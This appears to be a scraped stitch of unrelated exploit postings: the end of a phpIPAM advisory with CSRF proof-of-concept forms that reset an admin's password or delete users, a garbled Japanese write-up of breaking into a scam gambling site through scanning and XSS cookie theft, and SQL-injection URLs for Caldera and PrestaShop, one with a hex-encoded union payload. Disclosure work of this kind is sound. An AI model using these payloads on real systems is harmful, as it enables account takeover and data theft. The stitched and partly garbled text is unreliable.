User modification form isn't protected against CSRF attack. Consequently, a user/admin can be trapped to modify his mail or password  by clicking on a malicious link which will make him execute the following request :

PoC:
[REQUEST]
http://server/phpipam/site/admin/usersEditResult.php 
[DATA]
POSTDATA=real_name=phpIPAM+Admin&username=Admin&email=admin%40domain.local&role=Administrator&userId=1&action=edit&domainUser=0&password1=password123&password2=password123&lang=1&mailNotify=No&mailChangelog=

Here, the passwordof user named "Admin" will be modified to "password123" and mail will be modified to "admin@domain.local". All other attributes can be modified two. In this context, targeted user is specified with his "userId", we can generally guess that the userId "1" is the first admin of PHP Ipam.

Here is the used form to generate a request :
<form method=post action=http://server/phpipam/site/admin/usersEditResult.php>
        <input type=hidden name=real_name value=AdminModified>
        <input type=hidden name=username value=Admin><!-- we can change username -->
        <input type=hidden name=userId value=1><!-- This attribute must match with targeted user -->
        <input type=hidden name=email value="adminmodified@okok.fr"> <!-- we can change affected email-->
        <input type=hidden name=role value=Administrator><!-- we can change a user permission -->
        <input type=hidden name=action value=edit><!-- Here, we edit a user-->
        <input type=hidden name=domainUser value=user123>
        <input type=hidden name=password1 value=password123><!-- we can change password-->
        <input type=hidden name=password2 value=password123>
        <input type=hidden name=lang value=3>
        <input type=hidden name=notifyUser value=off>
        <input type=hidden name=mailNotify value=No>
        <input type=hidden name=mailChangelog value=no>
        <input type=submit value="Click here, it's awesome !">
</form>

Proof of Concept n°6 : CSRF on user deletion
================================================================================================
User deletion form isn't protected against CSRF attack. Consequently, an admin can be trapped to delete any user by clicking on a malicious link which will make him execute the following request :

[REQUEST]
http://server/phpipam/site/admin/usersEditPrint.php
[POSTDATA]
id=2&action=delete

In this context, targeted user is specified with his "userId".

Here is the used form to generate a request :
<form method=post action=http://server/phpipam/site/admin/usersEditResult.php>
        <input type=hidden name=userId value=5>
        <input type=hidden name=action value=delete>
        <input type=submit value="Click here, it's awesome !">
</form>

In this context, targeted user is specified with his "userId".

Screenshots :
======================================================================
- http://www.information-security.fr/wp-content/uploads/2015/12/php-ipam-multiple-vulnerabilities-05.jpg
- http://www.information-security.fr/wp-content/uploads/2015/12/php-ipam-multiple-vulnerabilities-06.jpg
- http://www.information-security.fr/wp-content/uploads/2015/12/php-ipam-multiple-vulnerabilities-09.jpg
- http://www.information-security.fr/wp-content/uploads/2015/12/php-ipam-multiple-vulnerabilities-10.jpg
- http://www.information-security.fr/wp-content/uploads/2015/12/php-ipam-multiple-vulnerabilities-11.jpg
- http://www.information-security.fr/wp-content/uploads/2015/12/php-ipam-multiple-vulnerabilities-03.jpg

Solution: 
======================================================================

Update your PHPIPAM Installation to version 1.2 :  https://github.com/phpipam/phpipam
 
Additional resources :
======================================================================
- http://information-security.fr/en/xss-csrf-sqli-php-ipam-version-1-1-010
- https://www.youtube.com/watch?v=86dJpyKYag4
- http://phpipam.net/

Report timeline :
======================================================================
2015-12-26 : Editor informed for vulnerabilities
2015-12-27 : Editor take a look and inform that a version 1.2 exist 
2016-01-04 : Advisory release

Credits :
======================================================================

    88888888
   88      888                                         88    88
  888       88                                         88
  788           Z88      88  88.888888     8888888   888888  88    8888888.
   888888.       88     88   888    Z88   88     88    88    88   88     88
       8888888    88    88   88      88  88       88   88    88   888
            888   88   88    88      88  88888888888   88    88     888888
  88         88    88  8.    88      88  88            88    88          888
  888       ,88     8I88     88      88   88      88   88    88  .88     .88
   ?8888888888.     888      88      88    88888888    8888  88   =88888888
       888.          88
                    88    www.synetis.com
                 8888  Consulting firm in management and information security
 
Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr

--
SYNETIS 
CONTACT: www.synetis.com | www.information-security.fr
HireHackking

1。事件の原因

1049983-20211227144129034-1183398783.pngこの兄弟は私を見つけて、彼がたくさんのお金をだまされたと言った。もちろん、私たちはただの白い帽子であり、私たちは助けることができます。もちろん、結局のところ、それは豚を殺すゲームであり、たとえ私たちが勝ったとしても、私たちはお金を回収することはできません。

2。情報収集

ターゲットWebサイトを取得すると、非常に従来のBCサイトであり、少し控えめであることが示されています。まず、簡単な情報を収集できます。 Wappalyzerプラグインを通して見ることができる2つのより重要な情報は、さらに2つの重要な情報です。1049983-20211227144129839-582442980.png 1049983-20211227144130754-1738092173.png。コマンドラインnslookup+URLのIPがチェックされているため、CDN 1049983-20211227144131137-251232392.pngがないことがわかりました。次に、Webmasterツールに移動して、http://s.tool.chinaz.com/same1049983-20211227144131556-2071526945.pngをご覧ください。香港、羊毛は羊から来て、中国人は中国人をだましていますか? IPアドレスを知った後、ポートスキャン(フルポートスキャン +サービス検出。

このプロセスは非常に長いです。最初に何か他のことをすることができます)1049983-20211227144132037-674543357.pngオープンポート3306を見て、接続して見てみましょう。1049983-20211227144132354-493297917.pngそれが機能しないことを発見し、外部から接続するべきではありません。

3。舞台裏のキャプチャ

Webに戻ると、バックハンド1049983-20211227144132673-1571870160.pngでURLの後ろに管理者を追加します。それから私は、BCの背景が一般的に別々に存在することを覚えています。そのため、XSSのみを見つけることができます。アカウントを登録してログインしてチェックアウトします。1049983-20211227144133552-30945993.png記入されたものは誤った情報です。真剣に受け止めないでください。1049983-20211227144134220-1187672434.png入力後、それは0日間のロマンスです。デポジットが1049983-20211227144134784-809181108.pngである場所で試してみたようです。XSSプラットフォームがCookieを受信できるかどうかを確認しました1049983-20211227144135520-1829786496.pngはCookieを受け取り、XSSが存在することを確認し、次のバックエンドにログインします。1049983-20211227144136208-1835927007.pngここでは、実際に多くのユーザーがいて、詐欺されたユーザーが管理者によって削除されるため、ユーザーがほとんどいないことがわかります。1049983-20211227144136869-1998591778.png

iv。アップロードポイントを見つけます

1049983-20211227144137330-865364977.pngデータベースのバックアップがあることを確認しましたが、ダウンロードすることは不可能であることがわかりました。あきらめた後、私はグループの大物に尋ねました。大きな男は、彼がフラッシュフィッシングを行うことができると言った。ソースコードをダウンロードした後、フラッシュフィッシングを行う条件が3つあることがわかりました。私は条件:自由スペース、フリードメイン名(ドメイン名はwww.flashxxx.tkになる可能性があります)を決定的に放棄しました。 CDN3を持っていません。同じIP Webサイトhttp://s.tool.chinaz.com/same4をクエリします。 NAMPを介してIPの対応するポートと指紋をスキャンし、ポート80、3306、および8800が開いていることがわかりました。5。 BCには特別なバックグラウンド管理6があります。ここで、誤ったテストログインアカウントを登録します。固定ポイント情報デポジット情報のユーザー名にXSSの脆弱性があります。送信後、レビュー担当者がクリックしてレビュー管理者8のクッキー情報を表示します。リーククッキーを介して、管理者の背景アドレスを表示できます。

HireHackking 
source: https://www.securityfocus.com/bid/67256/info
 
Caldera is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
 
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
http://www.example.com/costview2/printers.php?id_onglet=0&tr=0+union+select+0x3020756E696F6E2073656C656374206E756C6C2C404076657273696F6E2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C,null,null,0,null&deb=0
HireHackking 
source: https://www.securityfocus.com/bid/67249/info

PrestaShop is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PrestaShop 1.6.0 is vulnerable; other versions may also be affected. 

http://example.com/ajax/getSimilarManufacturer.php?id_manufacturer=3[SQL-injection]